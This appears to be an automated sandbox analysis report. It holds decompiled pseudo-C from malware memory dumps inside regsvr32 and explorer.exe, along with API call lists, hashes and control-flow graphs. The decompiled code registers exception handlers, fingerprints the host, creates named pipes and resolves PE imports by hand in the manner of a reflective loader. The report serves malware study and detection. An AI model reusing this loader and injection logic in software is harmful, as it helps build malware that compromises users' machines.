                                          					if(_t64 >= 0) {
                                          						_push(0);
                                          						_push( *0x1001e760);
                                          						_t51 = 0x27;
                                          						E10009F06(_t51);
                                          					}
                                          				} else {
                                          					_t64 = _t61 | 0xffffffff;
                                          				}
                                          				_t29 =  *0x1001e684; // 0x189faa0
                                          				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
                                          				_t48 =  *0x1001e6dc; // 0x0
                                          				 *0x1001e6d0 = 0;
                                          				E1000A4DB(_t48);
                                          				E1000861A( &_v24, 0);
                                          				_t16 = _t64;
                                          				goto L13;
                                          			}

                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                                          • Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
                                          • Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                                          • Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E10001B2D(void* __eflags, void* __fp0) {
                                          				char _v24;
                                          				char _v28;
                                          				void* _t12;
                                          				intOrPtr _t14;
                                          				void* _t15;
                                          				intOrPtr _t16;
                                          				void* _t17;
                                          				void* _t19;
                                          				void* _t20;
                                          				char _t24;
                                          				intOrPtr _t26;
                                          				intOrPtr _t28;
                                          				intOrPtr _t33;
                                          				intOrPtr _t38;
                                          				intOrPtr _t40;
                                          				void* _t41;
                                          				intOrPtr _t46;
                                          				void* _t48;
                                          				intOrPtr _t51;
                                          				void* _t61;
                                          				void* _t71;
                                          
                                          				_t71 = __fp0;
                                          				_t38 =  *0x1001e6f4; // 0x0
                                          				_t12 = E1000A4BF(_t38, 0);
                                          				while(_t12 < 0) {
                                          					E1000980C( &_v28);
                                          					_t40 =  *0x1001e700; // 0x0
                                          					_t14 =  *0x1001e704; // 0x0
                                          					_t41 = _t40 + 0x3840;
                                          					asm("adc eax, ebx");
                                          					__eflags = _t14 - _v24;
                                          					if(__eflags > 0) {
                                          						L13:
                                          						_t15 = 0;
                                          					} else {
                                          						if(__eflags < 0) {
                                          							L4:
                                          							_t16 =  *0x1001e684; // 0x189faa0
                                          							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
                                          							__eflags = _t17;
                                          							if(_t17 == 0) {
                                          								break;
                                          							} else {
                                          								_t33 =  *0x1001e684; // 0x189faa0
                                          								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                                          								_t51 =  *0x1001e6f4; // 0x0
                                          								__eflags = 0;
                                          								_t12 = E1000A4BF(_t51, 0);
                                          								continue;
                                          							}
                                          						} else {
                                          							__eflags = _t41 - _v28;
                                          							if(_t41 >= _v28) {
                                          								goto L13;
                                          							} else {
                                          								goto L4;
                                          							}
                                          						}
                                          					}
                                          					L12:
                                          					return _t15;
                                          				}
                                          				E1000980C(0x1001e700);
                                          				_t19 = GetCurrentProcess();
                                          				_t20 = GetCurrentThread();
                                          				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t24 =  *0x1001e6e8; // 0x0
                                          				_v28 = _t24;
                                          				_t61 = E10001A1B( &_v28, E1000131E, _t71);
                                          				if(_t61 >= 0) {
                                          					_push(0);
                                          					_push( *0x1001e760);
                                          					_t48 = 0x27;
                                          					E10009F06(_t48);
                                          				}
                                          				if(_v24 != 0) {
                                          					E10006890( &_v24);
                                          				}
                                          				_t26 =  *0x1001e684; // 0x189faa0
                                          				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
                                          				_t28 =  *0x1001e758; // 0x0
                                          				 *0x1001e6ec = 0;
                                          				_t29 =  !=  ? 1 : _t28;
                                          				_t46 =  *0x1001e6f4; // 0x0
                                          				 *0x1001e758 =  !=  ? 1 : _t28;
                                          				E1000A4DB(_t46);
                                          				_t15 = _t61;
                                          				goto L12;
                                          			}

                                          APIs
                                          • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
                                          • GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
                                          • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
                                          • DuplicateHandle.KERNEL32 ref: 10001BD9
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Current$Process$DuplicateHandleThread
                                          • String ID:
                                          • API String ID: 3566409357-0
                                          • Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                                          • Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
                                          • Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                                          • Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          C-Code - Quality: 100%
                                          			E000C5A61(void* __eflags) {
                                          				intOrPtr _t2;
                                          				void* _t6;
                                          				void* _t7;
                                          
                                          				_t2 =  *0xde684; // 0x14cf8f0
                                          				 *((intOrPtr*)(_t2 + 0x108))(1, E000C5A06);
                                          				E000C5631(_t6, _t7); // executed
                                          				return 0;
                                          			}

                                          APIs
                                          • RtlAddVectoredExceptionHandler.NTDLL(00000001,000C5A06,000C5CE8), ref: 000C5A6D
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionHandlerVectored
                                          • String ID:
                                          • API String ID: 3310709589-0
                                          • Opcode ID: d6f4ad1c99d02ec48078a8cc1cbcb086cbc8fad2bc79094a378f4e47e8bbdcd8
                                          • Instruction ID: c73ec1648ac1b9eac1dd2e70802dc4e625edaa9747ea1c085a3dbdbdc41907be
                                          • Opcode Fuzzy Hash: d6f4ad1c99d02ec48078a8cc1cbcb086cbc8fad2bc79094a378f4e47e8bbdcd8
                                          • Instruction Fuzzy Hash: DBB092742515405BD640AB60CC8AF8C32909B64742F0100A4B2468A0F3CAE0A4C06612
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 c4a0b-c4a3f memset 1 c4a5b-c4a64 call cbb8d 0->1 2 c4a41-c4a57 0->2 6 c4a7f-c4ae0 call cb7a8 call cb67d call c49c7 call cc379 call cd400 call cb88a call c2c8f 1->6 7 c4a66-c4a71 call c2ba4 1->7 2->1 26 c4aea-c4b09 call c92e5 6->26 27 c4ae2-c4ae5 6->27 10 c4a76-c4a79 7->10 10->6 12 c4d64 10->12 14 c4d66-c4d6c 12->14 30 c4b5e-c4b63 26->30 31 c4b0b-c4b13 26->31 27->12 32 c4b65-c4b97 call cc292 CreateNamedPipeA 30->32 33 c4bc6-c4bdb call c91e3 * 2 30->33 34 c4b15-c4b4f call c95e1 call cbfec call c85d5 31->34 35 c4b51-c4b53 31->35 45 c4bae-c4bc4 call c861a 32->45 46 c4b99-c4ba9 call c861a 32->46 52 c4be0-c4c01 call c9b43 33->52 37 c4b55-c4b59 call ce286 34->37 35->30 35->37 37->30 45->52 46->14 52->12 60 c4c07-c4c49 call c9f48 call c9f6c call ca0ab 52->60 67 c4c4b-c4c4d call ca3ed 60->67 68 c4c52-c4c57 60->68 67->68 70 c4c59-c4c5b call ca3ed 68->70 71 c4c60-c4c7d call c980c call ca0ab 68->71 70->71 76 c4c82-c4c8a 71->76 77 c4c8c-c4c98 76->77 78 c4cb2-c4cbf 76->78 81 c4cdd-c4ce4 77->81 82 c4c9a 77->82 79 c4cc9-c4cd6 call cfc1f 78->79 80 c4cc1-c4cc7 78->80 91 c4ca7-c4ca9 79->91 83 c4ca0-c4ca2 call c553f 80->83 85 c4cee-c4cfe call c52c0 81->85 86 c4ce6-c4ce9 call ce23e 81->86 82->83 83->91 93 c4d55-c4d5a 85->93 94 c4d00-c4d0c 85->94 86->85 95 c4cd8 91->95 96 c4cab 91->96 97 c4d5c-c4d60 93->97 98 c4d62 93->98 99 c4d4d-c4d4f lstrcpyW 94->99 100 c4d0e-c4d4b call c109a lstrcpyW call c85d5 lstrcatW * 3 94->100 95->81 96->78 97->98 98->12 99->93 100->93
                                          C-Code - Quality: 80%
                                          			E000C4A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                          				char _v516;
                                          				void _v1044;
                                          				char _v1076;
                                          				signed int _v1080;
                                          				signed int _v1096;
                                          				WCHAR* _v1100;
                                          				intOrPtr _v1104;
                                          				signed int _v1108;
                                          				CHAR* _v1112;
                                          				char _v1116;
                                          				void* __esi;
                                          				intOrPtr _t66;
                                          				CHAR* _t73;
                                          				signed int _t75;
                                          				intOrPtr _t76;
                                          				signed int _t80;
                                          				signed int _t81;
                                          				WCHAR* _t87;
                                          				void* _t89;
                                          				signed int _t90;
                                          				signed int _t91;
                                          				signed int _t93;
                                          				signed int _t94;
                                          				WCHAR* _t96;
                                          				CHAR* _t106;
                                          				void* _t108;
                                          				intOrPtr _t109;
                                          				signed char _t116;
                                          				WCHAR* _t118;
                                          				void* _t122;
                                          				signed int _t123;
                                          				intOrPtr _t125;
                                          				void* _t128;
                                          				void* _t129;
                                          				WCHAR* _t130;
                                          				void* _t134;
                                          				void* _t141;
                                          				void* _t143;
                                          				WCHAR* _t145;
                                          				signed int _t153;
                                          				void* _t154;
                                          				void* _t178;
                                          				signed int _t180;
                                          				void* _t181;
                                          				void* _t183;
                                          				void* _t187;
                                          				signed int _t188;
                                          				WCHAR* _t190;
                                          				signed int _t191;
                                          				signed int _t192;
                                          				intOrPtr* _t194;
                                          				signed int _t196;
                                          				void* _t199;
                                          				void* _t200;
                                          				void* _t201;
                                          				void* _t202;
                                          				intOrPtr* _t203;
                                          				void* _t208;
                                          
                                          				_t208 = __fp0;
                                          				_push(_t191);
                                          				_t128 = __edx;
                                          				_t187 = __ecx;
                                          				_t192 = _t191 | 0xffffffff;
                                          				memset( &_v1044, 0, 0x20c);
                                          				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                                          				_v1108 = 1;
                                          				if(_t187 != 0) {
                                          					_t123 =  *0xde688; // 0xf0000
                                          					_t125 =  *0xde68c; // 0x14cfab8
                                          					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                                          				}
                                          				if(E000CBB8D(_t187) != 0) {
                                          					L4:
                                          					_t134 = _t128; // executed
                                          					_t66 = E000CB7A8(_t134,  &_v516); // executed
                                          					_push(_t134);
                                          					_v1104 = _t66;
                                          					E000CB67D(_t66,  &_v1076, _t206, _t208);
                                          					_t129 = E000C49C7( &_v1076,  &_v1076, _t206);
                                          					_t141 = E000CD400( &_v1076, E000CC379( &_v1076), 0);
                                          					E000CB88A(_t141,  &_v1100, _t208);
                                          					_t175 =  &_v1076;
                                          					_t73 = E000C2C8F(_t187,  &_v1076, _t206, _t208); // executed
                                          					_v1112 = _t73;
                                          					_t143 = _t141;
                                          					if(_t73 != 0) {
                                          						_push(0);
                                          						_push(_t129);
                                          						_push("\\");
                                          						_t130 = E000C92E5(_t73);
                                          						_t200 = _t199 + 0x10;
                                          						_t75 =  *0xde688; // 0xf0000
                                          						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                                          						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                                          							L12:
                                          							__eflags = _v1108;
                                          							if(__eflags != 0) {
                                          								_t76 = E000C91E3(_v1112);
                                          								_t145 = _t130;
                                          								 *0xde740 = _t76;
                                          								 *0xde738 = E000C91E3(_t145);
                                          								L17:
                                          								_push(_t145);
                                          								_t80 = E000C9B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
                                          								_t188 = _t80;
                                          								_t201 = _t200 + 0x10;
                                          								__eflags = _t188;
                                          								if(_t188 == 0) {
                                          									goto L41;
                                          								}
                                          								_push(0xdb9ca);
                                          								E000C9F48(0xe); // executed
                                          								E000C9F6C(_t188, _t208, _t130); // executed
                                          								_t194 = _a4;
                                          								_v1096 = _v1096 & 0x00000000;
                                          								_push(2);
                                          								_v1100 =  *_t194;
                                          								_push(8);
                                          								_push( &_v1100);
                                          								_t178 = 0xb; // executed
                                          								E000CA0AB(_t188, _t178, _t208); // executed
                                          								_t179 =  *(_t194 + 0x10);
                                          								_t202 = _t201 + 0xc;
                                          								__eflags =  *(_t194 + 0x10);
                                          								if( *(_t194 + 0x10) != 0) {
                                          									E000CA3ED(_t188, _t179, _t208);
                                          								}
                                          								_t180 =  *(_t194 + 0xc);
                                          								__eflags = _t180;
                                          								if(_t180 != 0) {
                                          									E000CA3ED(_t188, _t180, _t208); // executed
                                          								}
                                          								_t87 = E000C980C(0);
                                          								_push(2);
                                          								_v1100 = _t87;
                                          								_t153 = _t188;
                                          								_push(8);
                                          								_v1096 = _t180;
                                          								_push( &_v1100);
                                          								_t181 = 2; // executed
                                          								_t89 = E000CA0AB(_t153, _t181, _t208); // executed
                                          								_t203 = _t202 + 0xc;
                                          								__eflags = _v1108;
                                          								if(_v1108 == 0) {
                                          									_t153 =  *0xde688; // 0xf0000
                                          									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                                          									if(__eflags != 0) {
                                          										_t90 = E000CFC1F(_t89, _t181, _t208, 0, _t130, 0);
                                          										_t203 = _t203 + 0xc;
                                          										goto L26;
                                          									}
                                          									_t153 = _t153 + 0x228;
                                          									goto L25;
                                          								} else {
                                          									_t91 =  *0xde688; // 0xf0000
                                          									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                                          									if(__eflags != 0) {
                                          										L32:
                                          										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                                          										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                                          											_t183 = 0x64;
                                          											E000CE23E(_t183);
                                          										}
                                          										E000C52C0( &_v1076, _t208);
                                          										_t190 = _a8;
                                          										_t154 = _t153;
                                          										__eflags = _t190;
                                          										if(_t190 != 0) {
                                          											_t94 =  *0xde688; // 0xf0000
                                          											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                                          											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                                          												lstrcpyW(_t190, _t130);
                                          											} else {
                                          												_t96 = E000C109A(_t154, 0x228);
                                          												_v1100 = _t96;
                                          												lstrcpyW(_t190, _t96);
                                          												E000C85D5( &_v1100);
                                          												 *_t203 = "\"";
                                          												lstrcatW(_t190, ??);
                                          												lstrcatW(_t190, _t130);
                                          												lstrcatW(_t190, "\"");
                                          											}
                                          										}
                                          										_t93 = _a12;
                                          										__eflags = _t93;
                                          										if(_t93 != 0) {
                                          											 *_t93 = _v1104;
                                          										}
                                          										_t192 = 0;
                                          										__eflags = 0;
                                          										goto L41;
                                          									}
                                          									_t51 = _t91 + 0x228; // 0xf0228
                                          									_t153 = _t51;
                                          									L25:
                                          									_t90 = E000C553F(_t153, _t130, __eflags);
                                          									L26:
                                          									__eflags = _t90;
                                          									if(_t90 >= 0) {
                                          										_t91 =  *0xde688; // 0xf0000
                                          										goto L32;
                                          									}
                                          									_push(0xfffffffd);
                                          									L6:
                                          									_pop(_t192);
                                          									goto L41;
                                          								}
                                          							}
                                          							_t106 = E000CC292(_v1104, __eflags);
                                          							_v1112 = _t106;
                                          							_t108 = CreateNamedPipeA(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                          							__eflags = _t108 - _t192;
                                          							if(_t108 != _t192) {
                                          								_t109 =  *0xde684; // 0x14cf8f0
                                          								 *((intOrPtr*)(_t109 + 0x30))();
                                          								E000C861A( &_v1116, _t192);
                                          								_t145 = _t108;
                                          								goto L17;
                                          							}
                                          							E000C861A( &_v1112, _t192);
                                          							_t81 = 1;
                                          							goto L42;
                                          						}
                                          						_t116 =  *(_t75 + 0x1898);
                                          						__eflags = _t116 & 0x00000004;
                                          						if((_t116 & 0x00000004) == 0) {
                                          							__eflags = _t116;
                                          							if(_t116 != 0) {
                                          								goto L12;
                                          							}
                                          							L11:
                                          							E000CE286(_v1112, _t175); // executed
                                          							goto L12;
                                          						}
                                          						_v1080 = _v1080 & 0x00000000;
                                          						_t118 = E000C95E1(_t143, 0x879);
                                          						_v1100 = _t118;
                                          						_t175 = _t118;
                                          						E000CBFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                                          						E000C85D5( &_v1100);
                                          						_t200 = _t200 + 0x14;
                                          						goto L11;
                                          					}
                                          					_push(0xfffffffe);
                                          					goto L6;
                                          				} else {
                                          					_t122 = E000C2BA4( &_v1044, _t192, 0x105); // executed
                                          					_t206 = _t122;
                                          					if(_t122 == 0) {
                                          						L41:
                                          						_t81 = _t192;
                                          						L42:
                                          						return _t81;
                                          					}
                                          					goto L4;
                                          				}
                                          			}


                                          APIs
                                          • memset.MSVCRT ref: 000C4A2D
                                          • CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,000000FF,00000400,00000400,00000000,00000000), ref: 000C4B8F
                                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 000C4D1F
                                          • lstrcatW.KERNEL32 ref: 000C4D3D
                                          • lstrcatW.KERNEL32 ref: 000C4D41
                                          • lstrcatW.KERNEL32 ref: 000C4D49
                                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 000C4D4F
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

                                          C-Code - Quality: 94%
                                          			E000CB7A8(WCHAR* __ecx, void* __edx) {
                                          				long _v8;
                                          				long _v12;
                                          				WCHAR* _v16;
                                          				short _v528;
                                          				short _v1040;
                                          				short _v1552;
                                          				WCHAR* _t27;
                                          				signed int _t29;
                                          				void* _t33;
                                          				long _t38;
                                          				WCHAR* _t43;
                                          				WCHAR* _t56;
                                          
                                          				_t44 = __ecx;
                                          				_v8 = _v8 & 0x00000000;
                                          				_t43 = __edx;
                                          				_t56 = __ecx;
                                          				memset(__edx, 0, 0x100);
                                          				_v12 = 0x100;
                                          				GetComputerNameW( &_v528,  &_v12);
                                          				lstrcpynW(_t43,  &_v528, 0x100);
                                          				_t27 = E000C95E1(_t44, 0xa88);
                                          				_v16 = _t27;
                                          				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                          				asm("sbb eax, eax");
                                          				_v8 = _v8 &  ~_t29;
                                          				E000C85D5( &_v16);
                                          				_t33 = E000CC392(_t43);
                                          				E000C9640( &(_t43[E000CC392(_t43)]), 0x100 - _t33, L"%u", _v8);
                                          				lstrcatW(_t43, _t56);
                                          				_t38 = E000CC392(_t43);
                                          				_v12 = _t38;
                                          				CharUpperBuffW(_t43, _t38);
                                          				return E000CD400(_t43, E000CC392(_t43) + _t40, 0);
                                          			}



                                          APIs
                                          • memset.MSVCRT ref: 000CB7C5
                                          • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 000CB7E0
                                          • lstrcpynW.KERNEL32(?,?,00000100), ref: 000CB7EF
                                          • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 000CB821
                                            • Part of subcall function 000C9640: _vsnwprintf.MSVCRT ref: 000C965D
                                          • lstrcatW.KERNEL32 ref: 000CB85A
                                          • CharUpperBuffW.USER32(?,00000000), ref: 000CB86C
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

                                          C-Code - Quality: 94%
                                          			E000CCF84(void* __ecx) {
                                          				intOrPtr _t11;
                                          				long _t12;
                                          				intOrPtr _t17;
                                          				intOrPtr _t18;
                                          				struct _OSVERSIONINFOA* _t29;
                                          
                                          				_push(__ecx);
                                          				_t29 =  *0xde688; // 0xf0000
                                          				GetCurrentProcess();
                                          				_t11 = E000CBA05(); // executed
                                          				_t1 = _t29 + 0x1644; // 0xf1644
                                          				_t25 = _t1;
                                          				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                                          				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                                          				_t33 = _t12;
                                          				if(_t12 != 0) {
                                          					_t12 = E000C8FBE(_t25, _t33);
                                          				}
                                          				_t3 = _t29 + 0x228; // 0xf0228
                                          				 *(_t29 + 0x1854) = _t12;
                                          				 *((intOrPtr*)(_t29 + 0x434)) = E000C8FBE(_t3, _t33);
                                          				memset(_t29, 0, 0x9c);
                                          				_t29->dwOSVersionInfoSize = 0x9c;
                                          				GetVersionExA(_t29);
                                          				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                                          				_t17 = E000CE3B6(_t3);
                                          				_t7 = _t29 + 0x220; // 0xf0220
                                          				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                                          				_t18 = E000CE3F1(_t7); // executed
                                          				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                                          				return _t18;
                                          			}



                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
                                          • GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
                                          • memset.MSVCRT ref: 000CCFE2
                                          • GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
                                          • GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Control-flow Graph

                                          control_flow_graph 134 d249b-d24a9 135 d24ab-d24ae 134->135 136 d24b3-d24f3 GetModuleHandleA call ce099 134->136 137 d2660-d2661 135->137 140 d265e 136->140 141 d24f9-d2510 136->141 140->137 142 d2513-d251a 141->142 143 d251c-d2525 142->143 144 d2527-d2537 142->144 143->142 145 d253a-d2541 144->145 145->140 146 d2547-d255e LoadLibraryA 145->146 147 d2568-d256e 146->147 148 d2560-d2563 146->148 149 d257d-d2586 147->149 150 d2570-d257b 147->150 148->137 151 d2589 149->151 150->151 152 d258d-d2593 151->152 153 d2599-d25b1 152->153 154 d2650-d2659 152->154 155 d25d4-d2602 153->155 156 d25b3-d25d2 153->156 154->145 159 d2605-d260b 155->159 156->159 160 d260d-d261b 159->160 161 d2639-d264b 159->161 162 d261d-d262f 160->162 163 d2631-d2637 160->163 161->152 162->161 163->161
                                          C-Code - Quality: 50%
                                          			E000D249B(signed int __eax, intOrPtr _a4) {
                                          				intOrPtr* _v8;
                                          				signed int* _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				intOrPtr _v32;
                                          				struct HINSTANCE__* _v36;
                                          				intOrPtr _v40;
                                          				signed int _v44;
                                          				struct HINSTANCE__* _v48;
                                          				intOrPtr _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				signed int _v64;
                                          				signed int _t109;
                                          				signed int _t112;
                                          				signed int _t115;
                                          				struct HINSTANCE__* _t121;
                                          				void* _t163;
                                          
                                          				_v44 = _v44 & 0x00000000;
                                          				if(_a4 != 0) {
                                          					_v48 = GetModuleHandleA("kernel32.dll");
                                          					_v40 = E000CE099(_v48, "GetProcAddress");
                                          					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                          					_v32 = _v52;
                                          					_t109 = 8;
                                          					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                          						L24:
                                          						return 0;
                                          					}
                                          					_v56 = 0x80000000;
                                          					_t112 = 8;
                                          					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                          					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                          						_v8 = _v8 + 0x14;
                                          					}
                                          					_t115 = 8;
                                          					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                          					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                          						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
                                          						_v36 = _t121;
                                          						if(_v36 != 0) {
                                          							if( *_v8 == 0) {
                                          								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                                          							} else {
                                          								_v12 =  *_v8 + _a4;
                                          							}
                                          							_v28 = _v28 & 0x00000000;
                                          							while( *_v12 != 0) {
                                          								_v24 = _v24 & 0x00000000;
                                          								_v16 = _v16 & 0x00000000;
                                          								_v64 = _v64 & 0x00000000;
                                          								_v20 = _v20 & 0x00000000;
                                          								if(( *_v12 & _v56) == 0) {
                                          									_v60 =  *_v12 + _a4;
                                          									_v20 = _v60 + 2;
                                          									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                                          									_v16 = _v40(_v36, _v20);
                                          								} else {
                                          									_v24 =  *_v12;
                                          									_v20 = _v24 & 0x0000ffff;
                                          									_v16 = _v40(_v36, _v20);
                                          								}
                                          								if(_v24 != _v16) {
                                          									_v44 = _v44 + 1;
                                          									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                          										 *_v12 = _v16;
                                          									} else {
                                          										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                                          									}
                                          								}
                                          								_v12 =  &(_v12[1]);
                                          								_v28 = _v28 + 4;
                                          							}
                                          							_v8 = _v8 + 0x14;
                                          							continue;
                                          						}
                                          						_t163 = 0xfffffffd;
                                          						return _t163;
                                          					}
                                          					goto L24;
                                          				}
                                          				return __eax | 0xffffffff;
                                          			}


                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000D24B8
                                          • LoadLibraryA.KERNEL32(00000000), ref: 000D2551
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleLibraryLoadModule
                                          • String ID: GetProcAddress$kernel32.dll
                                          • API String ID: 4133054770-1584408056
                                          • Opcode ID: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
                                          • Instruction ID: deaac39a8f92dcb34ee975fe36824c3fd640916c06a8e948343ef26f76a1822f
                                          • Opcode Fuzzy Hash: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
                                          • Instruction Fuzzy Hash: BB619C75900209EFDB50CF98D885BADBBF1FF08315F24859AE815AB391C774AA80DF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 164 c2eda-c2f50 memset call c902d 169 c2fcd-c2fd4 164->169 170 c2f52-c2f81 CreateWindowExA 164->170 171 c2fdf-c2ff4 169->171 173 c2fd6-c2fd7 169->173 170->171 172 c2f83-c2f92 ShowWindow 170->172 175 c2f9b 172->175 173->171 176 c2fba-c2fcb 175->176 176->169 178 c2f9d-c2fa0 176->178 178->169 179 c2fa2-c2fb2 178->179 179->176
                                          C-Code - Quality: 96%
                                          			E000C2EDA(void* __eflags) {
                                          				CHAR* _v12;
                                          				struct HINSTANCE__* _v32;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				void _v52;
                                          				char _v80;
                                          				char _v144;
                                          				intOrPtr _t25;
                                          				intOrPtr _t32;
                                          				struct HWND__* _t34;
                                          				intOrPtr _t36;
                                          				intOrPtr _t39;
                                          				struct HWND__* _t44;
                                          				intOrPtr _t47;
                                          				intOrPtr _t50;
                                          				void* _t51;
                                          				intOrPtr _t53;
                                          				intOrPtr _t56;
                                          				intOrPtr _t59;
                                          				struct HINSTANCE__* _t64;
                                          
                                          				_t25 =  *0xde684; // 0x14cf8f0
                                          				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
                                          				memset( &_v52, 0, 0x30);
                                          				_t59 =  *0xde688; // 0xf0000
                                          				E000C902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
                                          				_v48 = 3;
